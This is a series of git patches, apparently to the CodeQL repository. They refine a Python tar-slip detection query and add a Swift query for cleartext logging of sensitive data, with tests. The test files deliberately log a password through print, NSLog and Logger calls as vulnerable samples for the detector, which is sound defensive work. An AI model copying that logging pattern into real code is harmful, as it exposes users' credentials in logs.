GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:347:66:347:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:347:66:347:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:348:69:348:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:348:69:348:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:349:84:349:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:349:84:349:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:350:69:350:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:350:69:350:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:351:84:351:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) : | GRDB.swift:351:84:351:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:73:17:73:17 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) : | SQLite.swift:73:17:73:17 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:74:17:74:17 | unsafeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) : | SQLite.swift:74:17:74:17 | unsafeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:75:17:75:17 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) : | SQLite.swift:75:17:75:17 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | From 5fe62e293acb20518919691497eb66570c9cc3cf Mon Sep 17 00:00:00 2001 From: Rasmus Lerchedahl Petersen Date: Mon, 9 Jan 2023 17:45:50 +0100 Subject: [PATCH 137/381] python: fix bug, add clarifying comment --- .../ql/src/experimental/Security/CWE-022bis/TarSlipImprov.ql | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/python/ql/src/experimental/Security/CWE-022bis/TarSlipImprov.ql b/python/ql/src/experimental/Security/CWE-022bis/TarSlipImprov.ql index 80462fc91c0..0fa3580c1a0 100755 --- a/python/ql/src/experimental/Security/CWE-022bis/TarSlipImprov.ql +++ b/python/ql/src/experimental/Security/CWE-022bis/TarSlipImprov.ql @@ -107,10 +107,13 @@ class Configuration extends TaintTracking::Configuration { nodeTo = call ) or + // To handle the case of `with closing(tarfile.open()) as file:` + // we add a step from the first argument of `closing` to the call to `closing`, + // whenever that first argument is a return of `tarfile.open()`. exists(API::CallNode closing | closing = API::moduleImport("contextlib").getMember("closing").getACall() and nodeFrom = closing.getArg(0) and - nodeFrom = tarfileOpen().getReturn().getAValueReachingSink() and + nodeFrom = tarfileOpen().getReturn().getAValueReachableFromSource() and nodeTo = closing ) } From c142495a8bdfb24cea962d0fb7362d0c6b067ce6 Mon Sep 17 00:00:00 2001 From: Rasmus Lerchedahl Petersen Date: Mon, 9 Jan 2023 17:51:45 +0100 Subject: [PATCH 138/381] python: simplify code --- .../Security/CWE-022bis/TarSlipImprov.ql | 17 +++++------------ 1 file changed, 5 insertions(+), 12 deletions(-) diff --git a/python/ql/src/experimental/Security/CWE-022bis/TarSlipImprov.ql b/python/ql/src/experimental/Security/CWE-022bis/TarSlipImprov.ql index 0fa3580c1a0..175d5fd85f1 100755 --- a/python/ql/src/experimental/Security/CWE-022bis/TarSlipImprov.ql +++ b/python/ql/src/experimental/Security/CWE-022bis/TarSlipImprov.ql @@ -100,22 +100,15 @@ class Configuration extends TaintTracking::Configuration { } override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { - exists(AttrRead attr, MethodCallNode call | - attr.accesses(nodeFrom, "getmembers") and - nodeFrom = call.getObject() and - nodeFrom instanceof AllTarfileOpens and - nodeTo = call - ) + nodeTo.(MethodCallNode).calls(nodeFrom, "getmembers") and + nodeFrom instanceof AllTarfileOpens or // To handle the case of `with closing(tarfile.open()) as file:` // we add a step from the first argument of `closing` to the call to `closing`, // whenever that first argument is a return of `tarfile.open()`. - exists(API::CallNode closing | - closing = API::moduleImport("contextlib").getMember("closing").getACall() and - nodeFrom = closing.getArg(0) and - nodeFrom = tarfileOpen().getReturn().getAValueReachableFromSource() and - nodeTo = closing - ) + nodeTo = API::moduleImport("contextlib").getMember("closing").getACall() and + nodeFrom = nodeTo.(API::CallNode).getArg(0) and + nodeFrom = tarfileOpen().getReturn().getAValueReachableFromSource() } } From aad56097ac93e1b5c7d217d91e201e1f6141dd79 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Wed, 30 Nov 2022 13:04:10 +0100 Subject: [PATCH 139/381] Add Cleartext Loggin query for Swift. With some caveats: see TODO comments and failing tests. --- .../codeql/swift/dataflow/ExternalFlow.qll | 1 + .../swift/security/CleartextLogging.qll | 67 +++++++++ .../swift/security/CleartextLoggingQuery.qll | 32 +++++ .../Security/CWE-312/CleartextLogging.qhelp | 50 +++++++ .../Security/CWE-312/CleartextLogging.ql | 24 ++++ .../CWE-312/CleartextLoggingBad.swift | 0 .../CWE-312/CleartextLoggingGood.swift | 0 .../CWE-312/CleartextLoggingTest.expected | 0 .../Security/CWE-312/CleartextLoggingTest.ql | 24 ++++ .../CWE-312/cleartextLoggingTest.swift | 130 ++++++++++++++++++ 10 files changed, 328 insertions(+) create mode 100644 swift/ql/lib/codeql/swift/security/CleartextLogging.qll create mode 100644 swift/ql/lib/codeql/swift/security/CleartextLoggingQuery.qll create mode 100644 swift/ql/src/queries/Security/CWE-312/CleartextLogging.qhelp create mode 100644 swift/ql/src/queries/Security/CWE-312/CleartextLogging.ql create mode 100644 swift/ql/src/queries/Security/CWE-312/CleartextLoggingBad.swift create mode 100644 swift/ql/src/queries/Security/CWE-312/CleartextLoggingGood.swift create mode 100644 swift/ql/test/query-tests/Security/CWE-312/CleartextLoggingTest.expected create mode 100644 swift/ql/test/query-tests/Security/CWE-312/CleartextLoggingTest.ql create mode 100644 swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift diff --git a/swift/ql/lib/codeql/swift/dataflow/ExternalFlow.qll b/swift/ql/lib/codeql/swift/dataflow/ExternalFlow.qll index 2c90d1e7351..60f8bc9782b 100644 --- a/swift/ql/lib/codeql/swift/dataflow/ExternalFlow.qll +++ b/swift/ql/lib/codeql/swift/dataflow/ExternalFlow.qll @@ -89,6 +89,7 @@ private module Frameworks { private import codeql.swift.frameworks.StandardLibrary.UrlSession private import codeql.swift.frameworks.StandardLibrary.WebView private import codeql.swift.frameworks.Alamofire.Alamofire + private import codeql.swift.security.CleartextLogging private import codeql.swift.security.PathInjection private import codeql.swift.security.PredicateInjection } diff --git a/swift/ql/lib/codeql/swift/security/CleartextLogging.qll b/swift/ql/lib/codeql/swift/security/CleartextLogging.qll new file mode 100644 index 00000000000..9e5e551effd --- /dev/null +++ b/swift/ql/lib/codeql/swift/security/CleartextLogging.qll @@ -0,0 +1,67 @@ +/** Provides classes and predicates to reason about cleartext logging of sensitive data vulnerabilities. */ + +import swift +private import codeql.swift.dataflow.DataFlow +private import codeql.swift.dataflow.ExternalFlow +private import codeql.swift.security.SensitiveExprs + +/** A data flow sink for cleartext logging of sensitive data vulnerabilities. */ +abstract class CleartextLoggingSink extends DataFlow::Node { } + +/** A sanitizer for cleartext logging of sensitive data vulnerabilities. */ +abstract class CleartextLoggingSanitizer extends DataFlow::Node { } + +/** + * A unit class for adding additional taint steps. + * + * Extend this class to add additional taint steps that should apply to paths related to + * cleartext logging of sensitive data vulnerabilities. + */ +class CleartextLoggingAdditionalTaintStep extends Unit { + /** + * Holds if the step from `n1` to `n2` should be considered a taint + * step for flows related to cleartext logging of sensitive data vulnerabilities. + */ + abstract predicate step(DataFlow::Node n1, DataFlow::Node n2); +} + +private class DefaultCleartextLoggingSink extends CleartextLoggingSink { + DefaultCleartextLoggingSink() { sinkNode(this, "logging") } +} + +// TODO: Remove this. It shouldn't be necessary. +private class EncryptionCleartextLoggingSanitizer extends CleartextLoggingSanitizer { + EncryptionCleartextLoggingSanitizer() { this.asExpr() instanceof EncryptedExpr } +} + +/* + * TODO: Add a sanitizer for the OsLogMessage interpolation with .private/.sensitive privacy options, + * or restrict the sinks to require .public interpolation depending on what the default behavior is. + */ + +private class LoggingSinks extends SinkModelCsv { + override predicate row(string row) { + row = + [ + ";;false;print(_:separator:terminator:);;;Argument[0].ArrayElement;logging", + ";;false;print(_:separator:terminator:);;;Argument[1..2];logging", + ";;false;print(_:separator:terminator:toStream:);;;Argument[0].ArrayElement;logging", + ";;false;print(_:separator:terminator:toStream:);;;Argument[1..2];logging", + ";;false;NSLog(_:_:);;;Argument[0];logging", + ";;false;NSLog(_:_:);;;Argument[1].ArrayElement;logging", + ";;false;NSLogv(_:_:);;;Argument[0];logging", + ";;false;NSLogv(_:_:);;;Argument[1].ArrayElement;logging", + ";;false;vfprintf(_:_:_:);;;Agument[1..2];logging", + ";Logger;true;log(_:);;;Argument[0];logging", + ";Logger;true;log(level:_:);;;Argument[1];logging", + ";Logger;true;trace(_:);;;Argument[1];logging", + ";Logger;true;debug(_:);;;Argument[1];logging", + ";Logger;true;info(_:);;;Argument[1];logging", + ";Logger;true;notice(_:);;;Argument[1];logging", + ";Logger;true;warning(_:);;;Argument[1];logging", + ";Logger;true;error(_:);;;Argument[1];logging", + ";Logger;true;critical(_:);;;Argument[1];logging", + ";Logger;true;fault(_:);;;Argument[1];logging", + ] + } +} diff --git a/swift/ql/lib/codeql/swift/security/CleartextLoggingQuery.qll b/swift/ql/lib/codeql/swift/security/CleartextLoggingQuery.qll new file mode 100644 index 00000000000..d67f66e74b9 --- /dev/null +++ b/swift/ql/lib/codeql/swift/security/CleartextLoggingQuery.qll @@ -0,0 +1,32 @@ +/** + * Provides a taint-tracking configuration for reasoning about cleartext logging of + * sensitive data vulnerabilities. + */ + +import swift +private import codeql.swift.dataflow.DataFlow +private import codeql.swift.dataflow.TaintTracking +private import codeql.swift.security.CleartextLogging +private import codeql.swift.security.SensitiveExprs + +/** + * A taint-tracking configuration for cleartext logging of sensitive data vulnerabilities. + */ +class CleartextLoggingConfiguration extends TaintTracking::Configuration { + CleartextLoggingConfiguration() { this = "CleartextLoggingConfiguration" } + + override predicate isSource(DataFlow::Node source) { source.asExpr() instanceof SensitiveExpr } + + override predicate isSink(DataFlow::Node sink) { sink instanceof CleartextLoggingSink } + + override predicate isSanitizer(DataFlow::Node sanitizer) { + sanitizer instanceof CleartextLoggingSanitizer + } + + // Disregard paths that contain other paths. This helps with performance. + override predicate isSanitizerIn(DataFlow::Node node) { this.isSource(node) } + + override predicate isAdditionalTaintStep(DataFlow::Node n1, DataFlow::Node n2) { + any(CleartextLoggingAdditionalTaintStep s).step(n1, n2) + } +} diff --git a/swift/ql/src/queries/Security/CWE-312/CleartextLogging.qhelp b/swift/ql/src/queries/Security/CWE-312/CleartextLogging.qhelp new file mode 100644 index 00000000000..fc5c7ed6f5e --- /dev/null +++ b/swift/ql/src/queries/Security/CWE-312/CleartextLogging.qhelp @@ -0,0 +1,50 @@ + + + + +

    +Sensitive information that is logged unencrypted is accessible to an attacker +who gains access to the logs. +

    +     + + +

    +Ensure that sensitive information is always encrypted or obfuscated before being +logged. +

    + +

    +In general, decrypt sensitive information only at the point where it is +necessary for it to be used in cleartext. +

    + +

    +Be aware that external processes often store the standard out and +standard error streams of the application, causing logged sensitive +information to be stored. +

    +     + + +

    +The following example code logs user credentials (in this case, their password) +in plain text: +

    + +

    +Instead, the credentials should be encrypted, obfuscated, or omitted entirely: +

    + +     + + + +
  • M. Dowd, J. McDonald and J. Schuhm, The Art of Software Security Assessment, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.
    • +
  • M. Howard and D. LeBlanc, Writing Secure Code, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. Microsoft, 2002.
    • +
  • OWASP: Password Plaintext Storage.
    • + +     +     diff --git a/swift/ql/src/queries/Security/CWE-312/CleartextLogging.ql b/swift/ql/src/queries/Security/CWE-312/CleartextLogging.ql new file mode 100644 index 00000000000..2b21b5da1bc --- /dev/null +++ b/swift/ql/src/queries/Security/CWE-312/CleartextLogging.ql @@ -0,0 +1,24 @@ +/** + * @name Clear-text logging of sensitive information + * @description Logging sensitive information without encryption or hashing can + * expose it to an attacker. + * @kind path-problem + * @problem.severity error + * @security-severity 7.5 + * @precision high + * @id swift/clear-text-logging + * @tags security + * external/cwe/cwe-312 + * external/cwe/cwe-359 + * external/cwe/cwe-532 + */ + +import swift +import codeql.swift.dataflow.DataFlow +import codeql.swift.security.CleartextLoggingQuery +import DataFlow::PathGraph + +from DataFlow::PathNode src, DataFlow::PathNode sink +where any(CleartextLoggingConfiguration c).hasFlowPath(src, sink) +select sink.getNode(), src, sink, "This $@ is written to a log file.", src.getNode(), + "potentially sensitive information" diff --git a/swift/ql/src/queries/Security/CWE-312/CleartextLoggingBad.swift b/swift/ql/src/queries/Security/CWE-312/CleartextLoggingBad.swift new file mode 100644 index 00000000000..e69de29bb2d diff --git a/swift/ql/src/queries/Security/CWE-312/CleartextLoggingGood.swift b/swift/ql/src/queries/Security/CWE-312/CleartextLoggingGood.swift new file mode 100644 index 00000000000..e69de29bb2d diff --git a/swift/ql/test/query-tests/Security/CWE-312/CleartextLoggingTest.expected b/swift/ql/test/query-tests/Security/CWE-312/CleartextLoggingTest.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/swift/ql/test/query-tests/Security/CWE-312/CleartextLoggingTest.ql b/swift/ql/test/query-tests/Security/CWE-312/CleartextLoggingTest.ql new file mode 100644 index 00000000000..d57dc15bbad --- /dev/null +++ b/swift/ql/test/query-tests/Security/CWE-312/CleartextLoggingTest.ql @@ -0,0 +1,24 @@ +import swift +import codeql.swift.dataflow.DataFlow +import codeql.swift.security.CleartextLoggingQuery +import TestUtilities.InlineExpectationsTest + +class CleartextLogging extends InlineExpectationsTest { + CleartextLogging() { this = "CleartextLogging" } + + override string getARelevantTag() { result = "hasCleartextLogging" } + + override predicate hasActualResult(Location location, string element, string tag, string value) { + exists( + CleartextLoggingConfiguration config, DataFlow::Node source, DataFlow::Node sink, + Expr sinkExpr + | + config.hasFlow(source, sink) and + sinkExpr = sink.asExpr() and + location = sinkExpr.getLocation() and + element = sinkExpr.toString() and + tag = "hasCleartextLogging" and + value = source.asExpr().getLocation().getStartLine().toString() + ) + } +} diff --git a/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift b/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift new file mode 100644 index 00000000000..659ff02840d --- /dev/null +++ b/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift @@ -0,0 +1,130 @@ +// --- stubs --- + +func NSLog(_ format: String, _ args: CVarArg...) {} +func NSLogv(_ format: String, _ args: CVaListPointer) {} + +struct OSLogType : RawRepresentable { + static let `default` = OSLogType(rawValue: 0) + let rawValue: UInt8 + init(rawValue: UInt8) { self.rawValue = rawValue} +} + +struct OSLogStringAlignment { + static var none = OSLogStringAlignment() +} + +struct OSLogPrivacy { + enum Mask { case none } + static var auto = OSLogPrivacy() + static var `private` = OSLogPrivacy() + static var sensitive = OSLogPrivacy() + + static func auto(mask: OSLogPrivacy.Mask) -> OSLogPrivacy { return .auto } + static func `private`(mask: OSLogPrivacy.Mask) -> OSLogPrivacy { return .private } + static func `sensitive`(mask: OSLogPrivacy.Mask) -> OSLogPrivacy { return .sensitive } +} + +struct OSLogInterpolation : StringInterpolationProtocol { + typealias StringLiteralType = String + init(literalCapacity: Int, interpolationCount: Int) {} + func appendLiteral(_: Self.StringLiteralType) {} + mutating func appendInterpolation(_ argumentString: @autoclosure @escaping () -> String, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto) {} + mutating func appendInterpolation(_ argumentString: @autoclosure @escaping () -> String, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto, attributes: String) {} +} + +struct OSLogMessage : ExpressibleByStringInterpolation { + typealias StringInterpolation = OSLogInterpolation + typealias StringLiteralType = String + typealias ExtendedGraphemeClusterLiteralType = String + typealias UnicodeScalarLiteralType = String + init(stringInterpolation: OSLogInterpolation) {} + init(stringLiteral: String) {} + init(extendedGraphemeClusterLiteral: String) {} + init(unicodeScalarLiteral: String) {} +} + +struct Logger { + func log(_ message: OSLogMessage) {} + func log(level: OSLogType, _ message: OSLogMessage) {} + func notice(_: OSLogMessage) {} + func debug(_: OSLogMessage) {} + func trace(_: OSLogMessage) {} + func info(_: OSLogMessage) {} + func error(_: OSLogMessage) {} + func warning(_: OSLogMessage) {} + func fault(_: OSLogMessage) {} + func critical(_: OSLogMessage) {} + +} + +// --- tests --- + +func test1(password: String, passwordHash : String) { + print(password) // $ MISSING: hasCleartextLogging=63 + print(password, separator: "") // $ MISSING: $ hasCleartextLogging=64 + print("", separator: password) // $ hasCleartextLogging=65 + print(password, separator: "", terminator: "") // $ MISSING: hasCleartextLogging=66 + print("", separator: password, terminator: "") // $ hasCleartextLogging=67 + print("", separator: "", terminator: password) // $ hasCleartextLogging=68 + + NSLog(password) // $ hasCleartextLogging=70 + NSLog("%@", password as! CVarArg) // $ MISSING: hasCleartextLogging=71 + NSLog("%@ %@", "" as! CVarArg, password as! CVarArg) // $ MISSING: hasCleartextLogging=72 + NSLog("\(password)") // $ hasCleartextLogging=73 + NSLogv("%@", getVaList([password as! CVarArg])) // $ MISSING: hasCleartextLogging=74 + NSLogv("%@ %@", getVaList(["" as! CVarArg, password as! CVarArg])) // $ MISSING: hasCleartextLogging=75 + + let log = Logger() + log.log("\(password)") // $ hasCleartextLogging=78 + log.log("\(password, privacy: .private)") // Safe + log.log(level: .default, "\(password)") // $ hasCleartextLogging=80 + log.trace("\(password)") // $ hasCleartextLogging=81 + log.debug("\(password)") // $ hasCleartextLogging=82 + log.info("\(password)") // $ hasCleartextLogging=83 + log.notice("\(password)") // $ hasCleartextLogging=84 + log.warning("\(password)") // $ hasCleartextLogging=85 + log.error("\(password)") // $ hasCleartextLogging=86 + log.critical("\(password)") // $ hasCleartextLogging=87 + log.fault("\(password)") // $ hasCleartextLogging=88 +} +/* +class MyClass { + var harmless = "abc" + var password = "123" +} + +func test3(x: String) { + // alternative evidence of sensitivity... + + UserDefaults.standard.set(x, forKey: "myKey") // $ MISSING: hasCleartextLogging + doSomething(password: x); + UserDefaults.standard.set(x, forKey: "myKey") // $ hasCleartextLogging + + let y = getPassword(); + UserDefaults.standard.set(y, forKey: "myKey") // $ hasCleartextLogging + + let z = MyClass() + UserDefaults.standard.set(z.harmless, forKey: "myKey") // Safe + UserDefaults.standard.set(z.password, forKey: "myKey") // $ hasCleartextLogging +} + +func test4(passwd: String) { + // sanitizers... + + var x = passwd; + var y = passwd; + var z = passwd; + + UserDefaults.standard.set(x, forKey: "myKey") // $ hasCleartextLogging + UserDefaults.standard.set(y, forKey: "myKey") // $ hasCleartextLogging + UserDefaults.standard.set(z, forKey: "myKey") // $ hasCleartextLogging + + x = encrypt(x); + hash(data: &y); + z = ""; + + UserDefaults.standard.set(x, forKey: "myKey") // Safe + UserDefaults.standard.set(y, forKey: "myKey") // Safe + UserDefaults.standard.set(z, forKey: "myKey") // Safe +} +*/ \ No newline at end of file From b203a9eb6e90344c6955c5a74a7075a53253a056 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Wed, 7 Dec 2022 18:31:32 +0100 Subject: [PATCH 140/381] Add a sanitizer for OSLogPrivacy options Add test cases to verify how the sanitizer behaves depending on the argument type and the privacy option being used. --- .../swift/security/CleartextLogging.qll | 50 ++++++++++-- .../CWE-312/cleartextLoggingTest.swift | 77 +++++++++++++------ 2 files changed, 98 insertions(+), 29 deletions(-) diff --git a/swift/ql/lib/codeql/swift/security/CleartextLogging.qll b/swift/ql/lib/codeql/swift/security/CleartextLogging.qll index 9e5e551effd..e6261543077 100644 --- a/swift/ql/lib/codeql/swift/security/CleartextLogging.qll +++ b/swift/ql/lib/codeql/swift/security/CleartextLogging.qll @@ -29,15 +29,51 @@ private class DefaultCleartextLoggingSink extends CleartextLoggingSink { DefaultCleartextLoggingSink() { sinkNode(this, "logging") } } -// TODO: Remove this. It shouldn't be necessary. -private class EncryptionCleartextLoggingSanitizer extends CleartextLoggingSanitizer { - EncryptionCleartextLoggingSanitizer() { this.asExpr() instanceof EncryptedExpr } +/** + * A sanitizer for `OSLogMessage`s configured with the appropriate privacy option. + * Numeric and boolean arguments aren't redacted unless the `public` option is used. + * Arguments of other types are always redacted unless the `private` or `sensitive` options are used. + */ +private class OsLogPrivacyCleartextLoggingSanitizer extends CleartextLoggingSanitizer { + OsLogPrivacyCleartextLoggingSanitizer() { + exists(CallExpr c, AutoClosureExpr e | + c.getStaticTarget().getName().matches("appendInterpolation(_:%privacy:%)") and + c.getArgument(0).getExpr() = e and + this.asExpr() = e + | + e.getExpr().getType() instanceof OsLogNonRedactedType and + c.getArgumentWithLabel("privacy").getExpr().(OsLogPrivacyRef).isSafe() + or + not e.getExpr().getType() instanceof OsLogNonRedactedType and + not c.getArgumentWithLabel("privacy").getExpr().(OsLogPrivacyRef).isPublic() + ) + } } -/* - * TODO: Add a sanitizer for the OsLogMessage interpolation with .private/.sensitive privacy options, - * or restrict the sinks to require .public interpolation depending on what the default behavior is. - */ +/** A type that isn't redacted by default in an `OSLogMessage`. */ +private class OsLogNonRedactedType extends Type { + OsLogNonRedactedType() { + this.getName() = [["", "U"] + "Int" + ["", "16", "32", "64"], "Double", "Float", "Bool"] + } +} + +/** A reference to a field of `OsLogPrivacy`. */ +private class OsLogPrivacyRef extends MemberRefExpr { + string optionName; + + OsLogPrivacyRef() { + exists(FieldDecl f | this.getMember() = f | + f.getEnclosingDecl().(NominalTypeDecl).getName() = "OSLogPrivacy" and + optionName = f.getName() + ) + } + + /** Holds if this is a safe privacy option (private or sensitive). */ + predicate isSafe() { optionName = ["private", "sensitive"] } + + /** Holds if this is a public (that is, unsafe) privacy option. */ + predicate isPublic() { optionName = "public" } +} private class LoggingSinks extends SinkModelCsv { override predicate row(string row) { diff --git a/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift b/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift index 659ff02840d..21d1387fb79 100644 --- a/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift +++ b/swift/ql/test/query-tests/Security/CWE-312/cleartextLoggingTest.swift @@ -13,10 +13,16 @@ struct OSLogStringAlignment { static var none = OSLogStringAlignment() } +enum OSLogIntegerFormatting { case decimal } +enum OSLogInt32ExtendedFormat { case none } +enum OSLogFloatFormatting { case fixed } +enum OSLogBoolFormat { case truth } + struct OSLogPrivacy { enum Mask { case none } static var auto = OSLogPrivacy() static var `private` = OSLogPrivacy() + static var `public` = OSLogPrivacy() static var sensitive = OSLogPrivacy() static func auto(mask: OSLogPrivacy.Mask) -> OSLogPrivacy { return .auto } @@ -30,6 +36,23 @@ struct OSLogInterpolation : StringInterpolationProtocol { func appendLiteral(_: Self.StringLiteralType) {} mutating func appendInterpolation(_ argumentString: @autoclosure @escaping () -> String, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto) {} mutating func appendInterpolation(_ argumentString: @autoclosure @escaping () -> String, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto, attributes: String) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> Int, format: OSLogIntegerFormatting = .decimal, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> Int8, format: OSLogIntegerFormatting = .decimal, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> Int16, format: OSLogIntegerFormatting = .decimal, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> Int32, format: OSLogInt32ExtendedFormat, privacy: OSLogPrivacy = .auto) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> Int32, format: OSLogInt32ExtendedFormat, privacy: OSLogPrivacy = .auto, attributes: String) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> Int32, format: OSLogIntegerFormatting = .decimal, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> Int64, format: OSLogIntegerFormatting = .decimal, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> UInt, format: OSLogIntegerFormatting = .decimal, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> UInt8, format: OSLogIntegerFormatting = .decimal, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> UInt16, format: OSLogIntegerFormatting = .decimal, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> UInt32, format: OSLogIntegerFormatting = .decimal, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> UInt64, format: OSLogIntegerFormatting = .decimal, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> Double, format: OSLogFloatFormatting = .fixed, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> Double, format: OSLogFloatFormatting = .fixed, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto, attributes: String) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> Float,format: OSLogFloatFormatting = .fixed, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto) {} + mutating func appendInterpolation(_ number: @autoclosure @escaping () -> Float, format: OSLogFloatFormatting = .fixed, align: OSLogStringAlignment = .none, privacy: OSLogPrivacy = .auto, attributes: String) {} + mutating func appendInterpolation(_ boolean: @autoclosure @escaping () -> Bool, format: OSLogBoolFormat = .truth, privacy: OSLogPrivacy = .auto) {} } struct OSLogMessage : ExpressibleByStringInterpolation { @@ -60,32 +83,42 @@ struct Logger { // --- tests --- func test1(password: String, passwordHash : String) { - print(password) // $ MISSING: hasCleartextLogging=63 - print(password, separator: "") // $ MISSING: $ hasCleartextLogging=64 - print("", separator: password) // $ hasCleartextLogging=65 - print(password, separator: "", terminator: "") // $ MISSING: hasCleartextLogging=66 - print("", separator: password, terminator: "") // $ hasCleartextLogging=67 - print("", separator: "", terminator: password) // $ hasCleartextLogging=68 + print(password) // $ MISSING: hasCleartextLogging=86 + print(password, separator: "") // $ MISSING: $ hasCleartextLogging=97 + print("", separator: password) // $ hasCleartextLogging=88 + print(password, separator: "", terminator: "") // $ MISSING: hasCleartextLogging=89 + print("", separator: password, terminator: "") // $ hasCleartextLogging=90 + print("", separator: "", terminator: password) // $ hasCleartextLogging=91 - NSLog(password) // $ hasCleartextLogging=70 - NSLog("%@", password as! CVarArg) // $ MISSING: hasCleartextLogging=71 - NSLog("%@ %@", "" as! CVarArg, password as! CVarArg) // $ MISSING: hasCleartextLogging=72 - NSLog("\(password)") // $ hasCleartextLogging=73 - NSLogv("%@", getVaList([password as! CVarArg])) // $ MISSING: hasCleartextLogging=74 - NSLogv("%@ %@", getVaList(["" as! CVarArg, password as! CVarArg])) // $ MISSING: hasCleartextLogging=75 + NSLog(password) // $ hasCleartextLogging=93 + NSLog("%@", password as! CVarArg) // $ MISSING: hasCleartextLogging=94 + NSLog("%@ %@", "" as! CVarArg, password as! CVarArg) // $ MISSING: hasCleartextLogging=95 + NSLog("\(password)") // $ hasCleartextLogging=96 + NSLogv("%@", getVaList([password as! CVarArg])) // $ MISSING: hasCleartextLogging=97 + NSLogv("%@ %@", getVaList(["" as! CVarArg, password as! CVarArg])) // $ MISSING: hasCleartextLogging=98 + let bankAccount: Int = 0 let log = Logger() - log.log("\(password)") // $ hasCleartextLogging=78 + // These MISSING test cases will be fixed when we properly generate the CFG around autoclosures. + log.log("\(password)") // Safe + log.log("\(password, privacy: .auto)") // Safe log.log("\(password, privacy: .private)") // Safe - log.log(level: .default, "\(password)") // $ hasCleartextLogging=80 - log.trace("\(password)") // $ hasCleartextLogging=81 - log.debug("\(password)") // $ hasCleartextLogging=82 - log.info("\(password)") // $ hasCleartextLogging=83 - log.notice("\(password)") // $ hasCleartextLogging=84 - log.warning("\(password)") // $ hasCleartextLogging=85 - log.error("\(password)") // $ hasCleartextLogging=86 - log.critical("\(password)") // $ hasCleartextLogging=87 - log.fault("\(password)") // $ hasCleartextLogging=88 + log.log("\(password, privacy: .public)") // $ MISSING: hasCleartextLogging=106 + log.log("\(password, privacy: .sensitive)") // Safe + log.log("\(bankAccount)") // $ MISSING: hasCleartextLogging=108 + log.log("\(bankAccount, privacy: .auto)") // $ MISSING: hasCleartextLogging=109 + log.log("\(bankAccount, privacy: .private)") // Safe + 